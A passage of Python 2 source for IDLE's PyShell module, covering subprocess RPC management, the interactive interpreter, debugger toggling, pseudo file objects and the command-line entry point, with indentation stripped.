self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec", dont_inherit=True)
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, unicode) and IOBinding.encoding != 'utf-8':
try:
source = '# -*- coding: %s -*-\n%s' % (
IOBinding.encoding,
source.encode(IOBinding.encoding))
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Window"),
("help", "_Help"),
]
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.StackViewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super(PyShell, self).rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert', '<', 'iomark'):
return 'disabled'
return super(PyShell, self).rmenu_check_paste()
class PseudoFile(io.TextIOBase):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self._encoding = encoding
@property
def encoding(self):
return self._encoding
@property
def name(self):
return '<%s>' % self.tags
def isatty(self):
return True
class PseudoOutputFile(PseudoFile):
def writable(self):
return True
def write(self, s):
if self.closed:
raise ValueError("write to closed file")
if type(s) not in (unicode, str, bytearray):
# See issue #19481
if isinstance(s, unicode):
s = unicode.__getitem__(s, slice(None))
elif isinstance(s, str):
s = str.__str__(s)
elif isinstance(s, bytearray):
s = bytearray.__str__(s)
else:
raise TypeError('must be string, not ' + type(s).__name__)
return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
def __init__(self, shell, tags, encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self._line_buffer = ''
def readable(self):
return True
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, (int, long)):
raise TypeError('must be int, not ' + type(size).__name__)
result = self._line_buffer
self._line_buffer = ''
if size < 0:
while True:
line = self.shell.readline()
if not line: break
result += line
else:
while len(result) < size:
line = self.shell.readline()
if not line: break
result += line
self._line_buffer = result[size:]
result = result[:size]
return result
def readline(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, (int, long)):
raise TypeError('must be int, not ' + type(size).__name__)
line = self._line_buffer or self.shell.readline()
if size < 0:
size = len(line)
eol = line.find('\n', 0, size)
if eol >= 0:
size = eol + 1
self._line_buffer = line[size:]
return line[:size]
def close(self):
self.shell.close()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script, file=sys.stderr)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# start editor and/or shell windows:
root = Tk(className="Idle")
root.withdraw()
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif TkVersion >= 8.5:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(file=iconfile) for iconfile in iconfiles]
root.tk.call('wm', 'iconphoto', str(root), "-default", *icons)
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if macosxSupport.isAquaTk():
# There are some screwed up <2> class bindings for text
# widgets defined in Tk which we need to do away with.
# See issue #24801.
root.unbind_class('Text', '<B2>')
root.unbind_class('Text', '<B2-Motion>')
root.unbind_class('Text', '<<PasteSelection>>')
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
